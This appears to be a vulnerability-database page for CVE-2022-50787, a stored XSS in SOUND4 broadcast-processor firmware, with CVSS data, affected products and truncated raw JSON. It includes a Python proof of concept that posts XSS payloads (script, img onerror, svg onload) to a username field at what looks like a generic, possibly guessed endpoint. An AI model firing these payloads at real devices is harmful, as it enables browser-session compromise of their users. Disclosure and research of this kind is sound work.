Security Vulnerability Report
中文
CVE-2022-50787 CVSS 7.2 HIGH

CVE-2022-50787

Published: 2025-12-30 23:15:45
Last Modified: 2026-01-13 15:12:24
Source: [email protected]

Description

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x contains an unauthenticated stored cross-site scripting vulnerability in the username parameter that allows attackers to inject malicious scripts. Attackers can exploit the unvalidated username input to execute arbitrary HTML and JavaScript code in victim browser sessions without authentication.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:first_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:first:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
SOUND4 IMPACT 2.x
SOUND4 FIRST 2.x
SOUND4 PULSE 2.x
SOUND4 Eco 2.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2022-50787 PoC - Stored XSS in SOUND4 IMPACT/FIRST/PULSE/Eco # Target: SOUND4 devices running version 2.x target_url = "http://target-ip/api/user/profile" # Malicious payload for stored XSS xss_payload = '<script>alert(document.cookie)</script>' # Alternative payloads xss_payloads = [ '<img src=x onerror=alert(1)>', '<svg/onload=alert(document.domain)>', '<body onload=alert("XSS")>', '<iframe src="javascript:alert(\'XSS\')">' ] def exploit_stored_xss(target, payload): """Send XSS payload to username parameter""" headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0' } data = { 'username': payload, 'email': '[email protected]', 'action': 'update_profile' } try: response = requests.post(target, json=data, headers=headers, timeout=10) print(f"[*] Payload sent: {payload}") print(f"[*] Status: {response.status_code}") return response.status_code == 200 except Exception as e: print(f"[!] Error: {e}") return False def check_vulnerability(target): """Check if the target is vulnerable""" try: response = requests.get(target, timeout=10) if '<script>' in response.text or 'onerror=' in response.text: print("[+] Target appears to be vulnerable!") return True return False except: return False if __name__ == "__main__": print("CVE-2022-50787 SOUND4 Stored XSS Exploit") print("=" * 50) # Test with basic XSS payload exploit_stored_xss(target_url, xss_payload) # Check if vulnerable check_vulnerability(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50787", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:45.223", "lastModified": "2026-01-13T15:12:24.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x contains an unauthenticated stored cross-site scripting vulnerability in the username parameter that allows attackers to inject malicious scripts. Attackers can exploit the unvalidated username input to execute arbitrary HTML and JavaScript code in victim browser sessions without authentication."}, {"lang": "es", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco versiones 2.x contiene una vulnerabilidad de cross-site scripting almacenado no autenticada en el parámetro de nombre de usuario que permite a los atacantes inyectar scripts maliciosos. Los atacantes pueden explotar la entrada de nombre de usuario no validada para ejecutar código HTML y JavaScript arbitrario en las sesiones del navegador de la víctima sin autenticación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "33C347FE-DA7B-4137-87B8-E6A8AF4D307F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0A735654-A166-4B56-BF4D-F165B7E11043"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "5C4CF02A-8CF1-46FF-9EC0-FF779D60B6EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EC9BD81B-573A-4DA7-AC47-6C8AF1B6B18F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "18E34118-F11B-4BF2-BE23-7DAE0A6790FB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C46BF88C-955C-4F9E-B782-1EADA068F19D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "E0699DEA-9CDA-4BB4-8FA3-6A6FADE1A61E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "051868AE-E364-4CB3-B927-42B4E0C19D01"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criter ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.